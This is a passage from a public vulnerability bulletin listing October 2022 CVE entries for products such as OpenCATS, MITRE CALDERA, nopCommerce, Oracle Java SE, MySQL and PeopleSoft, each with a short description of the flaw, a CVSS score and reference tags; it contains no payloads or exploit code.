mindskip — xzs xzs v3.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /admin/question/edit. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field. 2022-10-17 5.4 CVE-2022-41431
MISC
MISC
MISC
MISC
miniorange — discord_integration The miniOrange Discord Integration WordPress plugin before 2.1.6 does not have authorisation and CSRF checks in some of its AJAX actions, allowing any logged-in user, such as a subscriber, to call them and, for example, disable the app. 2022-10-17 6.5 CVE-2022-3082
MISC
mitre — caldera MITRE CALDERA before 4.1.0 allows XSS in the Operations tab and/or Debrief plugin via a crafted operation name, a different vulnerability than CVE-2022-40606. 2022-10-17 6.1 CVE-2022-40605
MISC
mitre — caldera MITRE CALDERA before 4.1.0 allows XSS in the Operations tab and/or Debrief plugin via a crafted operation name, a different vulnerability than CVE-2022-40605. 2022-10-17 6.1 CVE-2022-40606
MISC
mitre — caldera MITRE CALDERA 4.1.0 allows stored XSS via app.contact.gist (aka the gist contact configuration field), leading to execution of arbitrary commands on agents. 2022-10-17 5.4 CVE-2022-41139
MISC
najeebmedia — frontend_file_manager_plugin The Frontend File Manager Plugin WordPress plugin before 21.4 does not have a CSRF check when uploading files, which could allow attackers to make logged-in users upload files on their behalf. 2022-10-17 4.3 CVE-2022-3126
MISC
nopcommerce — nopcommerce Multiple open redirect vulnerabilities in NopCommerce 4.10 through 4.50.1 allow remote attackers to conduct phishing attacks by redirecting users to attacker-controlled web sites via the returnUrl parameter, processed by the (1) ChangePassword function, (2) SignInCustomerAsync function, (3) SuccessfulAuthentication method, or (4) NopRedirectResultExecutor class. 2022-10-20 6.1 CVE-2022-26954
MISC
MISC
octoprint — octoprint Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository octoprint/octoprint prior to 1.8.3. 2022-10-19 6 CVE-2022-3607
CONFIRM
MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 suffers from a Cross Site Scripting (XSS) Vulnerability. 2022-10-14 6.1 CVE-2022-42071
MISC
MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 suffers from an Insecure Direct Object Reference (IDOR) vulnerability. 2022-10-14 4.3 CVE-2022-42067
MISC
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag update function. 2022-10-19 6.5 CVE-2022-43020
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage variable. 2022-10-19 6.5 CVE-2022-43021
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag deletion function. 2022-10-19 6.5 CVE-2022-43022
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors function. 2022-10-19 6.5 CVE-2022-43023
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter. 2022-10-19 6.1 CVE-2022-43014
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter. 2022-10-19 6.1 CVE-2022-43015
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback component. 2022-10-19 6.1 CVE-2022-43016
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component. 2022-10-19 6.1 CVE-2022-43017
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function. 2022-10-19 6.1 CVE-2022-43018
MISC
opencrx — opencrx OpenCRX before v5.2.2 was discovered to be vulnerable to password enumeration due to the difference in error messages received during a password reset which could enable an attacker to determine if a username, email or ID is valid. 2022-10-20 5.3 CVE-2022-40084
MISC
MISC
openharmony — openharmony OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have an out-of-bounds memory read and write vulnerability in the /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. An unprivileged process running on the device could read out-of-bounds memory, leading to sensitive information disclosure. A process running on the device with the system user UID would be able to write out-of-bounds memory, which could lead to unspecified memory corruption. 2022-10-14 4.4 CVE-2022-41686
MISC
oracle — access_manager Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: Authentication Engine). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Access Manager accessible data. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). 2022-10-18 5.3 CVE-2022-39405
MISC
oracle — applications_framework Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Session Management). Supported versions that are affected are 12.2.6-12.2.11. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Applications Framework accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2022-10-18 6.5 CVE-2022-21636
MISC
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Server). The supported version that is affected is 5.9.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N). 2022-10-18 5.7 CVE-2022-21609
MISC
oracle — communications_billing_and_revenue_management Vulnerability in the Oracle Communications Billing and Revenue Management product of Oracle Communications Applications (component: Connection Manager). Supported versions that are affected are 12.0.0.4.0-12.0.0.7.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Communications Billing and Revenue Management. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Communications Billing and Revenue Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Communications Billing and Revenue Management. CVSS 3.1 Base Score 6.5 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L). 2022-10-18 6.5 CVE-2022-21601
MISC
oracle — database_server Vulnerability in the Oracle Services for Microsoft Transaction Server component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Services for Microsoft Transaction Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Services for Microsoft Transaction Server, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Services for Microsoft Transaction Server accessible data as well as unauthorized read access to a subset of Oracle Services for Microsoft Transaction Server accessible data. Note: This vulnerability applies to Windows systems only. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2022-10-18 6.1 CVE-2022-21606
MISC
oracle — graalvm Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaScript). Supported versions that are affected are Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2022-10-18 5.3 CVE-2022-21597
MISC
oracle — graalvm Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JGSS). Supported versions that are affected are Oracle Java SE: 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). 2022-10-18 5.3 CVE-2022-21618
MISC
oracle — graalvm Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 2022-10-18 5.3 CVE-2022-21626
MISC
oracle — graalvm Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 2022-10-18 5.3 CVE-2022-21628
MISC
oracle — java_virtual_machine Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Procedure privilege with network access via Oracle Net to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java VM accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2022-10-18 4.3 CVE-2022-39419
MISC
oracle — jd_edwards_enterpriseone_tools Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.6.4 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2022-10-18 6.1 CVE-2022-21630
MISC
oracle — jd_edwards_enterpriseone_tools Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Design Tools SEC). Supported versions that are affected are 9.2.6.4 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2022-10-18 6.1 CVE-2022-21631
MISC
oracle — jd_edwards_enterpriseone_tools Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.6.4 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2022-10-18 5.4 CVE-2022-21629
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H). 2022-10-18 6.5 CVE-2022-21635
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 6.5 CVE-2022-39408
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 6.5 CVE-2022-39410
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21594
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21599
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21604
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.28 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21605
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.28 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21607
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.39 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21608
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Connection Handling). Supported versions that are affected are 5.7.39 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21617
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21632
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21633
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21637
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21638
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21640
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-21641
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.9 CVE-2022-39400
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: C API). Supported versions that are affected are 5.7.36 and prior and 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.4 CVE-2022-21595
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.4 CVE-2022-21625
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 5.7.39 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2022-10-18 4.3 CVE-2022-21589
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.7.39 and prior and 8.0.29 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2022-10-18 4.3 CVE-2022-21592
MISC
oracle — mysql Vulnerability in the MySQL Shell product of Oracle MySQL (component: Shell: Core Client). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Shell executes to compromise MySQL Shell. While the vulnerability is in MySQL Shell, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Shell accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N). 2022-10-18 4.3 CVE-2022-39402
MISC
oracle — mysql Vulnerability in the MySQL Installer product of Oracle MySQL (component: Installer: General). Supported versions that are affected are 1.6.3 and prior. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Installer executes to compromise MySQL Installer. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Installer accessible data as well as unauthorized read access to a subset of MySQL Installer accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Installer. CVSS 3.1 Base Score 4.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L). 2022-10-18 4.2 CVE-2022-39404
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.1 CVE-2022-21611
MISC
oracle — peoplesoft_enterprise Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Elastic Search Integration). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2022-10-18 6.1 CVE-2022-21639
MISC
oracle — peoplesoft_enterprise Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.58, 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2022-10-18 5.3 CVE-2022-21602
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Security). Supported versions that are affected are 8.58, 8.59 and 8.60. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where PeopleSoft Enterprise PeopleTools executes to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2022-10-18 5.5 CVE-2022-39407
MISC
